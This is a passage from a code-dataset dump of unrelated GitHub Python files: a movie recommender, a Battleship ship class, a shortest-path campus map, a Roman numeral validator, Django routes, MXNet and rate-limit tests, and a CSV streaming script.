movies_data[movies_data.title == close_match]['index'].values[0]\r\n similarity_score = list(enumerate(similarity[index_of_the_movie]))\r\n sorted_similar_movies = sorted(similarity_score, key = lambda x:x[1], reverse = True) \r\n i = 0\r\n for movie in sorted_similar_movies:\r\n index = movie[0]\r\n title_from_index = movies_data[movies_data.index==index]['title'].values[0]\r\n i+=1\r\n if i>= 2:\r\n recommend.append(title_from_index)\r\n if i==6:\r\n break\r\n\r\n if int(user_rating) < 3:\r\n movie_name = movie_name\r\n list_of_all_titles = movies_data['title'].tolist()\r\n find_close_match = difflib.get_close_matches(movie_name, list_of_all_titles)\r\n close_match = find_close_match[0]\r\n index_of_the_movie = movies_data[movies_data.title == close_match]['index'].values[0]\r\n similarity_score = list(enumerate(similarity[index_of_the_movie]))\r\n sorted_similar_movies = sorted(similarity_score, key = lambda x:x[1], reverse = True) \r\n i = 0\r\n for movie in sorted_similar_movies:\r\n index = movie[0]\r\n title_from_index = movies_data[movies_data.index==index]['title'].values[0]\r\n i+=1\r\n if i>= 2:\r\n if title_from_index in recommend:\r\n recommend.remove(title_from_index)\r\n if i==4:\r\n break\r\n \r\n count +=1\r\n\r\n result = sorted(recommend, key = recommend.count, reverse = True)\r\n res = [i for n, i in enumerate(result) if i not in result[:n]]\r\n for i in res[:]:\r\n if i in user_watched:\r\n res.remove(i)\r\n count3=0\r\n for i in res:\r\n if count3<6:\r\n ist.append(i)\r\n count3+=1\r\n\r\n ist2.append(ist)\r\n\r\nprint(ist2)\r\n\r\nfields = ['User id', 'Recomended movies'] \r\n \r\n \r\n# name of csv file \r\nfilename = r\"C:\\Users\\hp\\Downloads\\Book2.csv\"\r\n\r\n# writing to csv file \r\nwith open(filename, 'w') as csvfile: \r\n # creating a csv writer object \r\n csvwriter = csv.writer(csvfile) \r\n \r\n # writing the fields \r\n csvwriter.writerow(fields) \r\n \r\n # writing the data rows \r\n csvwriter.writerows(ist2)\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n","repo_name":"varadchaskar/Movie-Recommendation-System","sub_path":"csv import.py","file_name":"csv import.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10418450044","text":"import csv\nimport time\nfrom operator import itemgetter\n\ndef user_input():\n global user_country\n user_country = input('Please select how many countries out of 156 you would like to compare (type EXIT to quit): ')\n if user_country.lower() == 'exit':\n quit()\n else:\n try:\n if int(user_country) <= 0 or int(user_country) > numCountries:\n print('Number is out of range')\n return False\n except ValueError:\n print('Value you entered is not numeric!')\n return False\n return True\n\ndef comparison():\n global user_compare\n user_compare = int(input('Please choose number what do you want to know or do:\\n'\n '1. Score\\n'\n '2. GDP per capita\\n'\n '3. Social support\\n'\n '4. Healthy life expectancy\\n'\n '5. Freedom to make life choices\\n'\n '6. Generosity\\n'\n '7. Perceptions of corruption\\n'\n '8. Сhoose another number of countries to compare\\n'\n '9. Quit program\\n'))\n if user_compare == 9:\n quit()\n if user_compare == 8:\n return False\n return True\n\ndef Sort_values(j):\n global datalist\n print(f'{header[1]}, {header[j]}')\n datalist = sorted(datalist, key=itemgetter(j), reverse=True)\n i = 0\n for data in datalist:\n if i < int(user_country):\n print(f'{datalist[i][1]}, {datalist[i][j]}')\n i += 1\n return\n\nwith open('2019.csv', 'r', encoding='UTF8') as csv_file:\n csv_reader = csv.reader(csv_file)\n datalist = []\n header = next(csv_reader)\n for line in csv_reader:\n datalist.append(line)\n numCountries = len(datalist)\n while True:\n while user_input() == True:\n while comparison() == True:\n if user_compare < 1 or user_compare > 9:\n print('Сhoice beyond possibility')\n continue\n Sort_values(user_compare + 1)\n time.sleep(2.5)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Hanna2605/pythonProject","sub_path":"my_homework/homework_06/homework_06.py","file_name":"homework_06.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1439654923","text":"from Direction import Direction\n\nclass Ship:\n # all attributes are public for shorter code ( for now... )\n\n def __init__(self, name, length, color, coord=None, direction=None):\n assert(isinstance(name, str))\n assert(int(color) > 0 and int(color) < 255)\n \n if coord is not None:\n assert(len(coord) == 2)\n \n if direction is not None:\n assert(isinstance(direction, Direction))\n \n self.name = name\n self.length = length\n self.coord = coord\n self.direction = direction\n self.color = color\n\n def reset(self):\n self.coord = None\n self.direction = None\n\n def __eq__(self, other):\n if isinstance(other, Ship):\n return (self.name == other.name and self.length == other.length \\\n and self.coord == other.coord and self.direction == other.direction \\\n and self.color == other.color )\n\n return False\n\n def is_placed(self):\n return self.coord == None and self.direction == None\n\n def __str__(self):\n s = \"Ship name: \" + self.name + '\\n'\n s += \"Ship color: \" + str(self.color) + '\\n'\n s += \"Ship length: \" + str(self.length) + '\\n'\n\n if self.coord is not None: \n s += \"Ship coord: \" + str(self.coord) + '\\n'\n s += \"Ship orientation: \" + self.direction.value\n else:\n s += \"Ship coord: None\\n\"\n s += \"Ship orientation: None\\n\"\n\n return s\n","repo_name":"shetsecure/3i005","sub_path":"battelship_game_proba/src/Ship.py","file_name":"Ship.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17512698131","text":"import csv\r\nfrom math import asin, cos, sqrt, radians\r\nimport webbrowser\r\nimport numpy as np\r\nimport geopandas as gpd\r\nimport folium\r\nfrom scipy.sparse.csgraph import shortest_path\r\nfrom scipy.sparse import csr_matrix\r\nimport sys\r\n\r\norigin = [38.98691761313879, -76.94256431247602] # (0, 0)\r\n\r\n\r\ndef read_csv_data(file_path):\r\n data = np.genfromtxt(file_path, delimiter=',')\r\n return data\r\n\r\n\r\nedges = read_csv_data('edges.csv')\r\nrows = edges[:, 0]\r\ncols = edges[:, 1]\r\ndata = edges[:, 2]\r\nmax_id = int(np.max(edges[:, :2]))\r\nadjacency_matrix = csr_matrix((data, (rows, cols)), shape=(max_id + 1, max_id + 1))\r\n\r\n# To find the shortest path between all nodes\r\ndist_matrix, predecessors = shortest_path(csgraph=adjacency_matrix, directed=False, return_predecessors=True)\r\n\r\n\r\ndef plot_all_data_on_map(file_path):\r\n data = read_csv_data(file_path)\r\n\r\n # Create a GeoDataFrame from the data\r\n gdf = gpd.GeoDataFrame(\r\n {'id': range(len(data))},\r\n geometry=gpd.points_from_xy(data[:, 1], data[:, 0]), # Swapped longitude and latitude\r\n crs=\"EPSG:4326\" # this is the coordinate system for GPS\r\n )\r\n\r\n # Create a folium map centered at the mean of the coordinates\r\n m = folium.Map(location=[data[:, 0].mean(), data[:, 1].mean()], zoom_start=13) # Swapped longitude and latitude\r\n\r\n # Add all points to the map\r\n for _, row in gdf.iterrows():\r\n folium.CircleMarker(\r\n location=[row.geometry.y, row.geometry.x],\r\n radius=2,\r\n color='red',\r\n fill=True,\r\n fill_color='red',\r\n fill_opacity=0.9\r\n ).add_to(m)\r\n\r\n # Draw all edges between the nodes\r\n draw_edges_on_map(m, gdf, edges)\r\n\r\n return m\r\n\r\n\r\ndef draw_edges_on_map(m, gdf, edges):\r\n for edge in edges:\r\n start_node = gdf.loc[int(edge[0]), 'geometry']\r\n end_node = gdf.loc[int(edge[1]), 'geometry']\r\n folium.PolyLine([(start_node.y, start_node.x), (end_node.y, end_node.x)], color='black').add_to(m)\r\n\r\n\r\n# Function to construct path from predecessors matrix\r\ndef construct_path(start, end, predecessors):\r\n path = []\r\n i = end\r\n while i != start:\r\n path.append(i)\r\n i = predecessors[start, i]\r\n path.append(start)\r\n path.reverse()\r\n return path\r\n\r\n\r\n# calculates distance between two sets of longitude and latitude\r\ndef distance(lat1, lon1, lat2, lon2):\r\n # approximate radius of Earth in km\r\n R = 6371.0\r\n\r\n lat1_rad = radians(lat1)\r\n lon1_rad = radians(lon1)\r\n lat2_rad = radians(lat2)\r\n lon2_rad = radians(lon2)\r\n\r\n # haversine formula to calculate distance\r\n hav = 0.5 - cos(lat2_rad - lat1_rad) / 2 + cos(lat1_rad) * cos(lat2_rad) * (1 - cos(lon2_rad - lon1_rad)) / 2\r\n return (2 * R) * asin(sqrt(hav))\r\n\r\n\r\n# uses distance function to find nearest pair of longitude and latitude in a given file to a given pair\r\ndef nearest(csv_file, given_lat, given_lon):\r\n nearest_dist = float('inf') # set to infinity\r\n nearest_lat = None\r\n nearest_lon = None\r\n\r\n with open(csv_file, 'r') as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n file_lat = float(row[0])\r\n file_lon = float(row[1])\r\n\r\n dist = distance(float(given_lat), float(given_lon), file_lat, file_lon)\r\n\r\n if dist < nearest_dist:\r\n nearest_dist = dist\r\n nearest_lat = file_lat\r\n nearest_lon = file_lon\r\n\r\n return nearest_lat, nearest_lon\r\n\r\n\r\n# convert from coordinates to indices\r\ndef convert_coord(lat, lon, csv_file):\r\n with open(csv_file, 'r') as f:\r\n reader = csv.reader(f)\r\n count = 0\r\n for row in reader:\r\n # new nodes file as them switched\r\n if lat == float(row[0]) and lon == float(row[1]):\r\n return count\r\n else:\r\n count = count + 1\r\n\r\n\r\ndef draw_route_from_coordinates(start_coords, end_coords, map_all, edges_file='edges.csv', nodes_file='nodes.csv'):\r\n # Convert from coordinates to indices\r\n start_index = convert_coord(*nearest(nodes_file, *start_coords), nodes_file)\r\n end_index = convert_coord(*nearest(nodes_file, *end_coords), nodes_file)\r\n\r\n # Plot optimal route between two nodes\r\n draw_optimal_route(nodes_file, start_index, end_index, map_all, predecessors)\r\n map_all.save('my_map.html')\r\n webbrowser.open('my_map.html', new=2)\r\n\r\n\r\ndef draw_optimal_route(file_path, start, end, m, predecessors):\r\n # Check if there is a path between start and end\r\n if predecessors[start, end] == -9999:\r\n print(f\"No path exists between node {start} and node {end}.\")\r\n sys.exit();\r\n\r\n data = read_csv_data(file_path)\r\n\r\n # Construct the path\r\n path = construct_path(start, end, predecessors)\r\n\r\n print(f\"The computed path is: {path}\")\r\n\r\n # Create a GeoDataFrame from the data of nodes in the path\r\n gdf = gpd.GeoDataFrame(\r\n {'id': path},\r\n geometry=gpd.points_from_xy(data[path, 1], data[path, 0]), # Swapped longitude and latitude\r\n crs=\"EPSG:4326\" # this is the coordinate system for GPS\r\n )\r\n\r\n # Add the points in the path to the map\r\n for _, row in gdf.iterrows():\r\n folium.CircleMarker(\r\n location=[row.geometry.y, row.geometry.x],\r\n radius=3, # Adjust as needed\r\n color='blue',\r\n fill=True,\r\n fill_color='blue',\r\n fill_opacity=0.6 # Adjust as needed\r\n ).add_to(m)\r\n\r\n # Add the lines in the path to the map\r\n for i in range(len(path) - 1):\r\n start_node = gdf.iloc[i]['geometry']\r\n end_node = gdf.iloc[i + 1]['geometry']\r\n folium.PolyLine([(start_node.y, start_node.x), (end_node.y, end_node.x)], color='green').add_to(m)\r\n\r\n\r\nstart_coords = [sys.argv[1], sys.argv[2]]\r\nend_coords = [sys.argv[3], sys.argv[4]]\r\n\r\n# Plot all data points\r\nmap_all = plot_all_data_on_map('nodes.csv')\r\ndraw_route_from_coordinates(start_coords, end_coords, map_all)\r\n\r\n","repo_name":"hraza10/FIRE199","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71924293366","text":"import json\nimport click\n\n\ndef error(msg):\n click.secho(msg, fg=\"red\")\n\n\ndef get_resource(name, call, paginate=False, start=0, end=0):\n if start and start > end:\n error(\"Start index cannot be larger than the end index\")\n return\n click.secho(f\"{name}:\", fg=\"green\")\n data = call()\n if paginate:\n if end <=0:\n data = data[start: ]\n else:\n data = data[start:end+1]\n click.echo(json.dumps(data, indent=2))\n","repo_name":"andrmantz/Noobcash","sub_path":"cli/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25175599046","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom tracker import views\n\n# Create a router and register our viewsets with it.\nrouter = DefaultRouter()\n\n# The API URLs are now determined automatically by the router.\nurlpatterns = [\n path('auth', views.TrackerAuthorizeView.as_view()), # /auth\n path('refresh', views.TrackerRefreshView.as_view()), # /refresh\n path('delete', views.TrackerDeleteView.as_view()), # /delete\n path('', include(router.urls)),\n]","repo_name":"SYSC-4907-Group-51/backend","sub_path":"tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5350511491","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# The Romans represented numbers using the numerals ``I``, ``V``, ``X``, ``L``, ``C``, ``D``, and ``M``. These numerals represent the following numbers:\n# \n# |Roman Numeral\t|Hindu-Arabic Equivalent|\n# |:---|:---|\n# |I\t|1|\n# |V\t|5|\n# |X\t|10|\n# |L\t|50|\n# |C\t|100|\n# |D\t|500|\n# |M\t|1000|\n# \n# \n# For a number written in Roman numerals to be considered valid there are basic rules which must be followed. \n# 1. Repeating a numeral up to three times represents addition of the number. For example, III represents 1 + 1 + 1 = 3. \n# 2. Only I, X, C, and M can be repeated; V, L, and D cannot be, and there is no need to do so.\n# 3. Writing numerals that decrease from left to right represents addition of the numbers. For example, LX represents 50 + 10 = 60 and XVI represents 10 + 5 + 1 = 16.\n# 4. To write a number that otherwise would take repeating of a numeral four or more times, there is a subtraction rule. \n# 5. Writing a smaller numeral to the left of a larger numeral represents subtraction. For example, IV represents 5 - 1 = 4 and IX represents 10 - 1 = 9. To avoid ambiguity, the only pairs of numerals that use this subtraction rule are\n# \n# |Roman Numeral\t|Hindu-Arabic Equivalent|\n# |:---------------|:-----------------------|\n# |IV\t|4 = 5 - 1|\n# |IX\t|9 = 10 - 1|\n# |XL\t|40 = 50 - 10|\n# |XC\t|90 = 100 - 10|\n# |CD\t|400 = 500 - 100|\n# |CM\t|900 = 1000 - 100|\n# \n# Even though the rules allow some numbers to be expressed in more than one way there is always a \"best\" way of writing a particular number.\n# \n# For example, it would appear that there are at least six ways of writing the number sixteen:\n# ```\n# IIIIIIIIIIIIIIII\n# VIIIIIIIIIII\n# VVIIIIII\n# XIIIIII\n# VVVI\n# XVI\n# ```\n# However, according to the rules, only ``XIIIIII`` and ``XVI`` are valid, and the last example is considered to be the most efficient, as it uses the least number of numerals.\n# \n# In this project, you will read a roman numeral from the user. First, you need to check if the number if in a valid form according to the rules posted above. Then convert it to the minimal representation. It's essential to modularize your code, and you are free to use either for or while loop. You are not allowed to use any of the Python structures that are not taught so far. \n\n# In[1]:\n\n\ndef ValidRoman(roman_num):\n \"\"\"Validating if the strings entered are correct\"\"\"\n \n # Converting the letters to upper case (if any small letters are preset)\n global roman\n roman = roman_num.upper()\n print('The Roman Numeral entered is:',roman_num)\n \n # Separating the letters\n ind_ch = list(roman)\n \n # Creating an array of valid roman numerals to be considered \n valid = ['I', 'V', 'X', 'L', 'C', 'D', 'M']\n \n for character in ind_ch: \n if character not in valid:\n print('Error! Please enter the displayed characters only.')\n return False\n return True\n\ndef Repeat(roman):\n \"\"\"This function if any character other than I, X, C and M is repeated\"\"\"\n \n ind_ch = list(roman)\n \n for letter in ind_ch:\n if letter not in repeat and roman.count(letter)>1: \n return False\n return True\n\ndef DescRule(roman):\n \"\"\"This function will check if the characters are in descending order except a few exceptions\"\"\"\n \n ind_ch = list(roman)\n \n list_temp = []\n \n invalidFlag = False\n c = 0\n while c < len(ind_ch):\n #print('for c:',c)\n #print(roman[c:c+2])\n while roman[c:c+2] in combo:\n #print('while c:',c)\n if len(list_temp) == 0 or list_temp[-1] >= combo[roman[c:c+2]]:\n list_temp.append(combo[roman[c:c+2]])\n c = c + 2\n else:\n print('Invalid')\n invalidFlag = True\n return False\n #print('List_temp:',list_temp)\n #print('c:',c)\n if c == len(ind_ch):\n break\n \n #print('Last ele:',list_temp[-1])\n #print('Char:', ind_ch[c])\n #print('Value of char:',value[ind_ch[c]])\n if len(list_temp) == 0 or list_temp[-1] >= value[ind_ch[c]]:\n list_temp.append(value[ind_ch[c]])\n else:\n return False\n c+=1\n\n return True\n\ndef Rules(roman):\n \"\"\"This function validates the specified rules for the Roman Numeral to be valid\"\"\"\n \n ind_ch = list(roman)\n \n global sum_roman\n \n sum_roman = 0\n ch = 0\n while ch < len(ind_ch):\n \n count = 1\n \n \n while roman[ch:ch+2] in combo:\n sum_roman = sum_roman + combo[roman[ch:ch+2]]\n ch = ch + 2\n \n \n if ch == len(ind_ch):\n break\n \n while ch < len(ind_ch)-1 and ind_ch[ch] == ind_ch[ch+1]:\n count +=1\n ch += 1\n \n #if count % 3 == 0:\n #sum_roman = sum_roman + value[ind_ch[ch]] * count\n #else:\n if count <=9:\n sum_roman = sum_roman + value[ind_ch[ch]] * count\n else:\n print('Error!')\n return False\n break \n \n if ch == len(ind_ch)-1:\n break\n \n ch += 1\n print('Sum:',sum_roman)\n return sum_roman\n \ndef RomanRep(sum_roman):\n \"\"\"This function will return the minimal/official representation of the number\"\"\"\n b = 0\n roman_rep = \"\"\n \n roman_values = ['M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV','I']\n integer_values = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1] \n \n while sum_roman > 0:\n if sum_roman >= integer_values[b]:\n sum_roman = sum_roman - integer_values[b]\n roman_rep += roman_values[b]\n else:\n b = b + 1\n\n print('The minimal representation is:', roman_rep)\n return roman_rep\n\n\ns = False\n\nrepeat = ['I','X','C','M']\n\nvalue = {'I':1, 'V':5, 'X': 10, 'L':50, 'C': 100, 'D': 500, 'M':1000}\n\ncombo = {'IV': 4, 'IX':9, 'XL': 40, 'XC': 90, 'CD': 400, 'CM': 900}\n\nwhile not s:\n roman_num = input('Enter the Roman Numerals between I,V,X,L,C,D,M:')\n if roman_num.isnumeric():\n print('Error! The input has numeric characters!')\n continue\n s = ValidRoman(roman_num)\n if s == False:\n continue\n s = Repeat(roman)\n if s == False:\n print('Error!Only characters I,X,C and M can be repeated.')\n continue\n s = DescRule(roman)\n if s == False:\n continue\n s = Rules(roman)\n if s == False:\n continue\n s = RomanRep(sum_roman) \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Rakeshb95/Python---Roman-Numerals","sub_path":"Project 4_RXB180039.py","file_name":"Project 4_RXB180039.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13908090202","text":"import tensorflow as tf\nimport numpy as np\n\nclass networkData():\n '''\n Data structure for hand Keypoints & segmentation network\n '''\n def __init__(self, image, label, kps2D, kps3D, imageID, h, w, outType, dsName,\n topLeft = None,\n bottomRight = None,\n extraScale=None, camMat = None):\n if label is not None:\n if label.shape.ndims == 2:\n label = tf.expand_dims(label, 2)\n elif label.shape.ndims == 3 and label.shape.dims[2] == 1:\n pass\n else:\n raise ValueError('Input label shape must be [height, width], or '\n '[height, width, 1].')\n\n if label is not None:\n label.set_shape([None, None, 1])\n\n if kps2D is not None:\n kps2D = tf.reshape(kps2D,[-1, 3])\n if kps3D is not None:\n kps3D = tf.reshape(kps3D, [-1, 3])\n\n\n self.image = image\n self.label = label\n self.kps2D = kps2D\n self.kps3D = kps3D\n self.imageID = imageID\n self.width = w\n self.height = h\n self.outputType = outType\n self.datasetName = dsName\n\n self.topLeft = topLeft\n self.bottomRight = bottomRight\n self.extraScale = extraScale\n self.camMat = camMat","repo_name":"shreyashampali/HOnnotate","sub_path":"onlineAug/commonAug.py","file_name":"commonAug.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"76"} +{"seq_id":"7783646008","text":"class Solution:\n def findRedundantDirectedConnection(self, edges):\n can1 = None\n can2 = None\n parent = [i for i in range(len(edges) + 1)]\n for i, edge in enumerate(edges):\n p, c = edge\n c_p = parent[c]\n if c_p != c:\n can1 = [p, c]\n can2 = [c_p, c]\n edges[i][0] = 0\n break\n else:\n parent[c] = p\n parent = [i for i in range(len(edges) + 1)]\n for edge in edges:\n p, c = edge\n p_p = self.findParent(parent, p)\n c_p = self.findParent(parent, c)\n if p_p == c_p:\n if can2 is not None:\n return can2\n else:\n return edge\n parent[c_p] = p_p\n return can1\n\n\n def findParent(self, parent, cur):\n if cur != parent[cur]:\n parent[cur] = self.findParent(parent, parent[cur])\n return parent[cur]\n","repo_name":"qtsean/Leetcode","sub_path":"RedundantConnection.py","file_name":"RedundantConnection.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45567907873","text":"import mxnet as mx\nfrom common import *\n\n\ndef detect_cycle_from(sym, visited, stack):\n visited.add(sym.handle.value)\n stack.add(sym.handle.value)\n for s in sym.get_children():\n if s.handle.value not in visited:\n if detect_cycle_from(sym, visited, stack):\n return True\n elif s.handle.value in stack:\n return True\n stack.remove(sym.handle.value)\n return False\n\n\ndef has_no_cycle(sym):\n visited = set()\n stack = set()\n all_nodes = sym.get_internals()\n for s in all_nodes:\n if s.handle.value in visited:\n if detect_cycle_from(s, visited, stack):\n return False\n return True\n\n\ndef test_simple_cycle():\n inp = mx.sym.Variable('input', shape=[1,10])\n A = mx.sym.FullyConnected(data=inp, num_hidden=10, no_bias=False, name='A')\n B = mx.sym.FullyConnected(data=A, num_hidden=10, no_bias=False, name='B')\n D = mx.sym.sin(data=A, name='D')\n C = mx.sym.elemwise_add(lhs=B, rhs=D, name='C')\n arg_params = {\n 'I_weight': mx.nd.zeros([10,10]),\n 'I_bias': mx.nd.zeros([10]),\n 'A_weight': mx.nd.zeros([10,10]),\n 'A_bias': mx.nd.zeros([10]),\n 'B_weight': mx.nd.zeros([10,10]),\n 'B_bias': mx.nd.zeros([10]),\n }\n\n executor = C.simple_bind(ctx=mx.gpu(0), data=(1,10), softmax_label=(1,),\n shared_buffer=arg_params, grad_req='null', force_rebind=True)\n optimized_graph = mx.contrib.tensorrt.get_optimized_symbol(executor)\n assert has_no_cycle(optimized_graph), \"The graph optimized by TRT contains a cycle\"\n\n\nif __name__ == '__main__':\n import nose\n nose.runmodule()\n","repo_name":"researchmm/tasn","sub_path":"tasn-mxnet/tests/python/tensorrt/test_cycle.py","file_name":"test_cycle.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"76"} +{"seq_id":"42431790339","text":"from bddrest import status, given, when\n\nfrom accesshandler.models import Rule\nfrom accesshandler.cache import redisconnection, keystr\nfrom .helpers import LocalApplicableTestCase\n\n\nclass TestLog(LocalApplicableTestCase):\n\n @classmethod\n def mockup(cls):\n session = cls.create_session()\n cls.rule1 = Rule(pattern='/foo/bar', limit='2/min', is_exact_url=True)\n session.add(cls.rule1)\n\n cls.rule2 = Rule(pattern='/foo/.*', limit='2/min')\n session.add(cls.rule2)\n session.commit()\n\n def test_post(self):\n redisconn = redisconnection()\n redisconn.flushdb()\n json = dict(url=self.rule1.pattern, IP='1.1.1.1')\n\n with self.given(\n 'Post a log to check if passed the limit or not',\n '/apiv1/logs',\n 'POST',\n json=json,\n ):\n assert status == 200\n assert redisconn.get(keystr(json['IP'], json['url'])) == b'1'\n\n when('The specific IP viewed the url one more time')\n assert status == 200\n assert redisconn.get(keystr(json['IP'], json['url'])) == b'2'\n\n when('The specific IP viewed the url more than valid limitation')\n assert status == 429\n assert redisconn.get(keystr(json['IP'], json['url'])) == b'3'\n\n when(\n 'IP field is not in form',\n json=given - 'IP',\n )\n assert status == 400\n\n when(\n 'URL field is not in form',\n json=given - 'url',\n )\n assert status == 400\n\n","repo_name":"shayan-7/accesshandler","sub_path":"tests/test_log_post.py","file_name":"test_log_post.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1388335176","text":"from dgl.data import CoraGraphDataset, CoraFullDataset, RedditDataset, CoauthorCSDataset, AmazonCoBuyComputerDataset, CiteseerGraphDataset\nfrom ogb.nodeproppred import DglNodePropPredDataset\nfrom sklearn.preprocessing import MinMaxScaler\nimport scipy.sparse as sp\nimport numpy as np\nimport os\nimport random\nimport torch\nfrom config import *\nfrom torch.nn.functional import one_hot\n\n\ndef download(dataset):\n if dataset == 'Cora':\n return CoraGraphDataset()\n elif dataset == 'CoraFull':\n return CoraFullDataset(raw_dir=\"../dataset\")\n elif dataset == 'Reddit':\n return RedditDataset()\n elif dataset == 'ogbn-arxiv':\n return DglNodePropPredDataset(name='ogbn-arxiv', root=\"../dataset\")\n elif dataset == 'Coauthor-CS':\n return CoauthorCSDataset()\n elif dataset == 'Amazon-Computer':\n return AmazonCoBuyComputerDataset()\n elif dataset == 'CiteSeer':\n return CiteseerGraphDataset()\n else:\n print(\"dataset not support!\")\n return None\n\n\ndef load(dataset):\n datadir = os.path.join('data', dataset)\n # class_split = {\"train\": 0.6, \"test\": 0.4}\n\n ds = download(dataset)\n if dataset == 'ogbn-arxiv':\n ds = ds[0]\n adj = ds[0].adj().to_dense().numpy().astype(int)\n adj = sp.csr_matrix(adj)\n feat = ds[0].ndata['feat'][:]\n labels = ds[0].ndata['label'][:]\n\n class_list = [i for i in range(ds.num_classes)]\n train_num = class_split[dataset][\"train\"]\n dev_num = class_split[dataset][\"dev\"]\n test_num = class_split[dataset][\"test\"]\n random.shuffle(class_list)\n train_class = class_list[: train_num]\n dev_class = class_list[train_num : train_num + dev_num]\n test_class = class_list[train_num + dev_num:]\n print(\"train_num: {}; dev_num: {}; test_num: {}\".format(train_num, dev_num, test_num))\n id_by_class = {}\n for i in class_list:\n id_by_class[i] = []\n for id, cla in enumerate(torch.squeeze(labels).tolist()):\n id_by_class[cla].append(id)\n\n idx_train = []\n for cla in train_class:\n idx_train.extend(id_by_class[cla])\n\n labels = one_hot(labels).numpy()\n\n return adj, feat, labels, train_class, dev_class, test_class, id_by_class\n\n\ndef test_task_generator(id_by_class, class_list, n_way, k_shot, m_query):\n\n # sample class indices\n class_selected = random.sample(class_list, n_way)\n id_support = []\n id_query = []\n\n for cla in class_selected:\n temp = random.sample(id_by_class[cla], k_shot + m_query)\n id_support.extend(temp[:k_shot])\n id_query.extend(temp[k_shot:])\n\n return np.array(id_support), np.array(id_query), class_selected\n\n\nif __name__ == '__main__':\n load('CiteSeer')\n# return\n","repo_name":"Zhen-Tan-dmml/TLP-FSNC","sub_path":"GCL/merit/data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"37454894837","text":"\"\"\"This script shows how to simulate a real time data transfer while reading from a csv source file\"\"\"\n\nfrom os.path import join, realpath, dirname\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport csv\nfrom time import ctime, sleep\n\n#Getting the File Path\nfile_path = dirname(realpath(__file__))\ndir_path = join(file_path, 'assests/acc_records.csv')\n\n#USING THE DICTREADER METHOD\ndef read_by_dict_method():\n\t#reading in the file object\n\tfile_object = open(dir_path, \"r\")\n\tdata = csv.DictReader(file_object)\n\n\t#simulating real time data transfer\n\tfor row in data:\n\t\tprint(row)\n\t\tsleep(1)\n\tfile_object.close()\n\n#USING THE READER METHOD\n#make a connection to the database\n#ensure you create a database first\ndef read_by_reader_method():\n\tengine = create_engine(f\"postgresql://{'root'}:{'root'}@{'localhost'}:{5432}/{'test_db'}\")\n\twith open(dir_path, 'r') as file_object:\n\t\tdata = csv.reader(file_object)\n\t\t#create the header row and skip through it\n\t\theader = next(data)\n\t\t#simulating a real time data transfer\n\t\tfor row in data:\n\t\t\tdf_row = pd.DataFrame([row], columns = header)\n\t\t\tprint(df_row)\n\t\t\tdf_row.to_sql('db_table_name', engine=engine, if_exists='append', index =False)\n\t\t\tprint(f'committed to db at: {ctime()}')\n\t\t\tsleep(1)\n\n\nif __name__ == '__main__':\n\tread_by_dict_method()\n\n\n\n\n","repo_name":"paulonye/kafka_projects","sub_path":"datagen.py","file_name":"datagen.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74560865524","text":"import MySQLdb\nimport sys\nsys.path.append('../')\nfrom config import basedir\nsys.path.append(basedir)\nsys.path.append(basedir + '/lineupSolver')\n\n\nfrom config import *\nfrom shared_utils import *\nfrom deck_manager import *\nconnection = MySQLdb.connect(host='localhost', user=db_user, passwd=db_passwd)\ncursor = connection.cursor()\n\ndef make_archetype_sheet(archetype):\n archetype_print = archetype.replace(' ', '')\n region = 'NA'\n output_file = open('NA_sheets/%(archetype_print)s.csv' % locals(), 'w')\n decks = []\n deckstrings = []\n cursor.execute('SELECT deck_name, deck_id, deck_code FROM deckstrings.decks WHERE deck_archetype = \"%(archetype)s\" and playoff_region = \"%(region)s\" and date > \"2019_01_01\"' % locals())\n for deck_name, deck_id, deck_code in cursor.fetchall():\n deck_code = deck_code.strip()\n deckstrings.append(deck_code)\n decks.append(EasyDeck(deck_code, deck_name))\n\n compare = decks[0]\n for i in range(0, len(decks)):\n decks = decks[:i+1] + sorted(decks[i+1:], key=lambda x:x.get_distance(decks[i]))\n output_file.write(side_by_side_diff_csv(decks))\n output_file.close()\n #print(len(set(deckstrings)), len(deckstrings))\n\ndef make_lineups_sheet():\n output_file = open('NA_sheets/Lineups.csv', 'w')\n region = 'NA'\n 